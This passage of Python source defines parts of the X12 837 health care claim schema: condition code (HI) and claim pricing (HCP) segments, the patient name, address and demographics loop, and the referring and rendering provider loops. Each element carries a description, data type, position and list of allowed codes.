desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI01-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="02", ), Element( "HI02-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BO"], ), ), Element( "HI02-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI02-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI02-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI02-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI02-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI02-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI02-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI02-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="03", ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="04", ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="05", ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="06", ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="07", ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="08", ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="09", ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="10", ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="11", ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="12", ), ), ), Segment( "HI", Properties( desc="Condition Information", position="2310", repeat="2", req_sit="S", syntax="", ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="R", seq="01", ), Element( "HI01-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI01-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI01-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI01-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI01-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI01-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI01-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI01-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI01-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="02", ), Element( "HI02-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI02-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI02-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI02-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI02-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI02-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI02-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI02-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI02-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="03", ), Element( "HI03-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI03-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI03-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI03-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI03-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI03-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI03-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI03-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI03-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="04", ), Element( "HI04-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI04-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI04-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI04-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI04-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI04-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI04-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI04-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI04-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="05", ), Element( "HI05-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI05-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI05-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI05-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI05-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI05-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI05-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI05-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI05-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="06", ), Element( "HI06-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI06-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI06-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI06-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI06-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI06-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI06-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI06-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI06-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="07", ), Element( "HI07-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI07-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI07-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI07-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI07-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI07-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI07-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI07-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI07-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="08", ), Element( "HI08-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI08-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI08-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI08-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI08-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI08-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI08-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI08-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI08-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="09", ), Element( "HI09-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI09-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI09-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI09-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI09-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI09-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI09-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI09-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI09-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="10", ), Element( "HI10-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI10-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI10-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI10-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI10-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI10-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI10-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI10-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI10-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="11", ), Element( "HI11-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI11-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI11-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI11-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI11-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI11-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI11-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI11-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI11-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="12", ), Element( "HI12-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI12-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI12-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI12-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI12-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI12-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI12-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI12-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI12-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), ), Segment( "HCP", Properties( desc="Claim Pricing/Repricing Information", position="2410", repeat="1", req_sit="S", syntax="R0113 P0910 P1112", ), Element( "HCP01", Properties( desc="Pricing Methodology", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=[ "00", "01", "02", "03", "04", "05", "07", "08", "09", "10", "11", "12", "13", "14", ], ), ), Element( "HCP02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "HCP03", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=3, codes=[], ), ), Element( "HCP04", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=4, codes=[], ), ), Element( "HCP05", Properties( desc="Rate", req_sit="S", data_type=("R", "1", "9"), position=5, codes=[], ), ), Element( "HCP06", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=6, codes=[], ), ), Element( "HCP07", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=7, codes=[], ), ), Element( "HCP08", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=8, codes=[], ), ), Element( "HCP09", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=9, codes=[], ), ), Element( "HCP10", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=10, codes=[], ), ), Element( "HCP11", Properties( desc="Unit or Basis for Measurement Code", req_sit="N", data_type=("ID", "2", "2"), position=11, codes=[], ), ), Element( "HCP12", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=12, codes=[], ), ), Element( "HCP13", Properties( desc="Reject Reason Code", req_sit="S", data_type=("ID", "2", "2"), position=13, codes=["T1", "T2", "T3", "T4", "T5", "T6"], ), ), Element( "HCP14", Properties( desc="Policy Compliance Code", req_sit="S", data_type=("ID", "1", "2"), position=14, codes=["1", "2", "3", "4", "5"], ), ), Element( "HCP15", Properties( desc="Exception Code", req_sit="S", data_type=("ID", "1", "2"), position=15, codes=["1", "2", "3", "4", "5", "6"], ), ), ), parsed_837_2310A, parsed_837_2310B, parsed_837_2310C, parsed_837_2310D, parsed_837_2310E, parsed_837_2310F, parsed_837_2320, parsed_837_2400, ) parsed_837_2010CA = Loop( "2010CA", Properties( desc="Patient Name", looptype="", position="0150", repeat="1", req_sit="R" ), Segment( "NM1", Properties( desc="Patient Name", position="0150", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["QC"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Patient Address", position="0250", repeat="1", req_sit="R", syntax="" ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Patient City, State, ZIP Code", position="0300", repeat="1", req_sit="R", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), Segment( "DMG", Properties( desc="Patient Demographic Information", position="0320", repeat="1", req_sit="R", syntax="P0102 P1011 C1105", ), Element( "DMG01", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["D8"], ), ), Element( "DMG02", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=2, codes=[], ), ), Element( "DMG03", Properties( desc="Gender Code", req_sit="R", data_type=("ID", "1", "1"), position=3, codes=["F", "M", "U"], ), ), Element( "DMG04", Properties( desc="Marital Status Code", req_sit="N", data_type=("ID", "1", "1"), position=4, codes=[], ), ), Composite( "C056", Properties( desc="Composite Race or Ethnicity Information", refdes="", repeat="10", req_sit="N", seq="05", ), ), Element( "DMG06", Properties( desc="Citizenship Status Code", req_sit="N", data_type=("ID", "1", "2"), position=6, codes=[], ), ), Element( "DMG07", Properties( desc="Country Code", req_sit="N", data_type=("ID", "2", "3"), position=7, codes=[], ), ), Element( "DMG08", Properties( desc="Basis of Verification Code", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "DMG09", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=9, codes=[], ), ), Element( "DMG10", Properties( desc="Code List Qualifier Code", req_sit="N", data_type=("ID", "1", "3"), position=10, codes=[], ), ), Element( "DMG11", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=11, codes=[], ), ), ), Segment( "REF", Properties( desc="Property and Casualty Claim Number", position="0350", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["Y4"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Property and Casualty Patient Identifier", position="0350", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["1W", "SY"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "PER", Properties( desc="Property and Casualty Patient Contact Information", position="0400", repeat="1", req_sit="S", syntax="P0304 P0506 P0708", ), Element( "PER01", Properties( desc="Contact Function Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["IC"], ), ), Element( "PER02", Properties( desc="Name", req_sit="S", data_type=("AN", "1", "60"), position=2, codes=[], ), ), Element( "PER03", Properties( desc="Communication Number Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=3, codes=["TE"], ), ), Element( "PER04", Properties( desc="Communication Number", req_sit="R", data_type=("AN", "1", "256"), position=4, codes=[], ), ), Element( "PER05", Properties( desc="Communication Number Qualifier", req_sit="S", data_type=("ID", "2", "2"), position=5, codes=["EX"], ), ), Element( "PER06", Properties( desc="Communication Number", req_sit="S", data_type=("AN", "1", "256"), position=6, codes=[], ), ), Element( "PER07", Properties( desc="Communication Number Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=7, codes=[], ), ), Element( "PER08", Properties( desc="Communication Number", req_sit="N", data_type=("AN", "1", "256"), position=8, codes=[], ), ), Element( "PER09", Properties( desc="Contact Inquiry Reference", req_sit="N", data_type=("AN", "1", "20"), position=9, codes=[], ), ), ), ) parsed_837_2310A = Loop( "2310A", Properties( desc="Referring Provider Name", looptype="", position="2500", repeat="2", req_sit="S", ), Segment( "NM1", Properties( desc="Referring Provider Name", position="2500", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["DN", "P3"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Referring Provider Secondary Identification", position="2710", repeat="3", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2310B = Loop( "2310B", Properties( desc="Rendering Provider Name", looptype="", position="2500", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Rendering Provider Name", position="2500", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["82"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1", "2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "PRV", Properties( desc="Rendering Provider Specialty Information", position="2550", repeat="1", req_sit="S", syntax="P0203", ), Element( "PRV01", Properties( desc="Provider Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["PE"], ), ), Element( "PRV02", Properties( 